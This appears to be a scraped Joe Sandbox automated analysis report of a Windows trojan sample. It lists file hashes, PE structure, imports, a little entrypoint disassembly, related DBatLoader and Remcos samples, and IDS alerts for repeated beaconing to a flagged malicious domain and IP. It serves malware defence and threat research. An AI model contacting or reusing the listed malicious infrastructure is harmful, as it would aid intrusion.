6BE4RDldhw.exe, 00000000.00000003.2475288001.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521127885.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827529061.00000000206D1000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521010683.0000000000931000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FAC6000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            108.170.55.202
            taksonsdfg.co.inUnited States
            20454SSASN2UStrue
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1562862
            Start date and time:2024-11-26 08:11:05 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 26s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:6BE4RDldhw.exe
            renamed because original name is a hash value
            Original Sample Name:04ea25c19c4f9bc7788cc78115386f2a8c0647bc23980cd57d8376fc0d1e7820.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@1/0@1/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 22
            • Number of non-executed functions: 39
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            TimeTypeDescription
            02:12:07API Interceptor29x Sleep call for process: 6BE4RDldhw.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            108.170.55.202https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8Get hashmaliciousHTMLPhisherBrowse
              FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                  241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                    Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                      Uduknnywyznljn.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                        IN-34823_PO39276-pdf.vbeGet hashmaliciousRemcos, DBatLoaderBrowse
                          Products_Specification.XLs.PIF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                            PAYMENT SWIFT.XLs.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                              #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                taksonsdfg.co.inFACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                • 108.170.55.202
                                GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                • 108.170.55.202
                                241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                • 108.170.55.202
                                Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                • 108.170.55.202
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                SSASN2USarm.elfGet hashmaliciousMirai, MoobotBrowse
                                • 198.15.97.148
                                https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8Get hashmaliciousHTMLPhisherBrowse
                                • 108.170.55.202
                                5.htaGet hashmaliciousUnknownBrowse
                                • 131.153.13.235
                                nabmips.elfGet hashmaliciousUnknownBrowse
                                • 64.38.201.185
                                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                • 108.170.53.110
                                bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                • 198.15.73.56
                                FACTURA.cmdGet hashmaliciousDBatLoaderBrowse
                                • 108.170.55.202
                                AGjaVihni8.elfGet hashmaliciousMirai, GafgytBrowse
                                • 66.85.144.18
                                GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                • 108.170.55.202
                                241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
                                • 108.170.55.202
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                a0e9f5d64349fb13191bc781f81f42e1AnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousUnknownBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousUnknownBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousUnknownBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousUnknownBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousUnknownBrowse
                                • 108.170.55.202
                                file.exeGet hashmaliciousUnknownBrowse
                                • 108.170.55.202
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.666050576830342
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                • Windows Screen Saver (13104/52) 0.13%
                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                File name:6BE4RDldhw.exe
                                File size:1'483'264 bytes
                                MD5:1a6538c76ae6ea94e5a6976adf7dbd67
                                SHA1:f31c769d58680d42e5c34a8119bf855fc4920060
                                SHA256:04ea25c19c4f9bc7788cc78115386f2a8c0647bc23980cd57d8376fc0d1e7820
                                SHA512:9b2122be0467ad85968353b2423277d32483daf7eedf2a6ca3660c220c0bbd0552ea223838e0de188ea87481c3a669b54703ca32c13987530bd69460b93ef7aa
                                SSDEEP:24576:Gj2o2Y8F82BK8Uk1zVv2+8OioUMxW24Q7Q9Z:2pih6+8OiSWaOZ
                                TLSH:A0658CF1DDD34073E16D2A38485B57943B3F7A212A24787722E7295CBEE2183E416C6B
                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                Icon Hash:276ea3a6a6b7bfbf
                                Entrypoint:0x4777b0
                                Entrypoint Section:.itext
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                DLL Characteristics:
                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:e0c584ef26caf72c3edd541e067b9b27
                                Instruction
                                push ebp
                                mov ebp, esp
                                add esp, FFFFFFF0h
                                mov eax, 00476028h
                                call 00007F57E8BDCB31h
                                mov eax, dword ptr [004831D4h]
                                mov eax, dword ptr [eax]
                                call 00007F57E8C36AC1h
                                mov ecx, dword ptr [00482F5Ch]
                                mov eax, dword ptr [004831D4h]
                                mov eax, dword ptr [eax]
                                mov edx, dword ptr [00475850h]
                                call 00007F57E8C36AC1h
                                mov eax, dword ptr [004831D4h]
                                mov eax, dword ptr [eax]
                                call 00007F57E8C36B35h
                                call 00007F57E8BDA888h
                                lea eax, dword ptr [eax+00h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8a0000x28de.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x970000xde200.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x8f0000x7ed8.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x8e0000x18.rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x8a7a80x654.idata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x752800x754007b99ecf2d40774d0dee5d319e4406c89False0.5062633262260128data6.533447895719042IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .itext0x770000x7f80x8007939fb42346a3573bcce4beaa0aff3dbFalse0.63037109375data6.197498060325328IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .data0x780000xb37c0xb4009e775d362392e93a9c5f11021bcec23bFalse0.09756944444444444data6.0082253940594486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .bss0x840000x50800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata0x8a0000x28de0x2a001a6b44b7edf62d7422a9f2343472ad2bFalse0.31212797619047616data5.124714462266893IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .tls0x8d0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rdata0x8e0000x180x200f7330844b74feb8abc687f6e65c4714cFalse0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x8f0000x7ed80x8000399f34b3422492e1759fcfd458b423caFalse0.614990234375data6.673102018475595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                .rsrc0x970000xde2000xde20040b7c388d388d5d084c1cdf3f71850f1False0.46841257210185705data5.750257466428882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_CURSOR0x97ad80x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                RT_CURSOR0x97c0c0x134dataEnglishUnited States0.4642857142857143
                                RT_CURSOR0x97d400x134dataEnglishUnited States0.4805194805194805
                                RT_CURSOR0x97e740x134dataEnglishUnited States0.38311688311688313
                                RT_CURSOR0x97fa80x134dataEnglishUnited States0.36038961038961037
                                RT_CURSOR0x980dc0x134dataEnglishUnited States0.4090909090909091
                                RT_CURSOR0x982100x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                RT_BITMAP0x983440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                RT_BITMAP0x985140x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                RT_BITMAP0x986f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                RT_BITMAP0x988c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                RT_BITMAP0x98a980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                RT_BITMAP0x98c680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                RT_BITMAP0x98e380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                RT_BITMAP0x990080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                RT_BITMAP0x991d80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                RT_BITMAP0x993a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                RT_BITMAP0x995780xd7a28Device independent bitmap graphic, 800 x 368 x 24, image size 883200, resolution 3780 x 3780 px/mEnglishUnited States0.4712977220234591
                                RT_BITMAP0x170fa00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                RT_ICON0x1710880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4800656660412758
                                RT_DIALOG0x1721300x52data0.7682926829268293
                                RT_DIALOG0x1721840x52data0.7560975609756098
                                RT_STRING0x1721d80x33cdata0.4384057971014493
                                RT_STRING0x1725140x1acdata0.572429906542056
                                RT_STRING0x1726c00xccdata0.6764705882352942
                                RT_STRING0x17278c0x114data0.6086956521739131
                                RT_STRING0x1728a00x350data0.43514150943396224
                                RT_STRING0x172bf00x3acdata0.3797872340425532
                                RT_STRING0x172f9c0x370data0.4022727272727273
                                RT_STRING0x17330c0x3ccdata0.33539094650205764
                                RT_STRING0x1736d80x214data0.49624060150375937
                                RT_STRING0x1738ec0xccdata0.6274509803921569
                                RT_STRING0x1739b80x194data0.5643564356435643
                                RT_STRING0x173b4c0x3c4data0.3288381742738589
                                RT_STRING0x173f100x338data0.42961165048543687
                                RT_STRING0x1742480x294data0.42424242424242425
                                RT_RCDATA0x1744dc0x10data1.5
                                RT_RCDATA0x1744ec0x310data0.7040816326530612
                                RT_RCDATA0x1747fc0x95fDelphi compiled form 'T__159519113'0.4476865360566903
                                RT_GROUP_CURSOR0x17515c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                RT_GROUP_CURSOR0x1751700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                RT_GROUP_CURSOR0x1751840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                RT_GROUP_CURSOR0x1751980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                RT_GROUP_CURSOR0x1751ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                RT_GROUP_CURSOR0x1751c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                RT_GROUP_CURSOR0x1751d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                RT_GROUP_ICON0x1751e80x14data1.2
                                DLLImport
                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                oleaut32.dllGetErrorInfo, SysFreeString
                                ole32.dllCoUninitialize, CoInitialize
                                kernel32.dllSleep
                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                comdlg32.dllGetOpenFileNameA
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-11-26T08:12:11.473687+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702108.170.55.202443TCP
                                2024-11-26T08:12:13.402767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749708108.170.55.202443TCP
                                2024-11-26T08:12:15.703179+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749715108.170.55.202443TCP
                                2024-11-26T08:12:17.524193+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749721108.170.55.202443TCP
                                2024-11-26T08:12:19.920234+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749728108.170.55.202443TCP
                                2024-11-26T08:12:21.806763+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749729108.170.55.202443TCP
                                2024-11-26T08:12:24.073316+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749737108.170.55.202443TCP
                                2024-11-26T08:12:25.967840+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749744108.170.55.202443TCP
                                2024-11-26T08:12:28.320613+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749752108.170.55.202443TCP
                                2024-11-26T08:12:30.481324+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749760108.170.55.202443TCP
                                2024-11-26T08:12:32.876400+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749767108.170.55.202443TCP
                                2024-11-26T08:12:34.802777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749773108.170.55.202443TCP
                                2024-11-26T08:12:37.141813+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749780108.170.55.202443TCP
                                2024-11-26T08:12:39.020661+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749786108.170.55.202443TCP
                                2024-11-26T08:12:41.309552+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749793108.170.55.202443TCP
                                2024-11-26T08:12:43.143202+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749799108.170.55.202443TCP
                                2024-11-26T08:12:45.806689+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749806108.170.55.202443TCP
                                2024-11-26T08:12:47.762699+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749812108.170.55.202443TCP
                                2024-11-26T08:12:50.115790+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749819108.170.55.202443TCP
                                2024-11-26T08:12:52.206224+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749825108.170.55.202443TCP
                                2024-11-26T08:12:54.864294+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749832108.170.55.202443TCP
                                2024-11-26T08:12:56.779735+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749838108.170.55.202443TCP
                                2024-11-26T08:12:59.051286+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749845108.170.55.202443TCP
                                2024-11-26T08:13:00.973326+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749850108.170.55.202443TCP
                                2024-11-26T08:13:03.808752+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749858108.170.55.202443TCP
                                2024-11-26T08:13:05.681335+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749862108.170.55.202443TCP
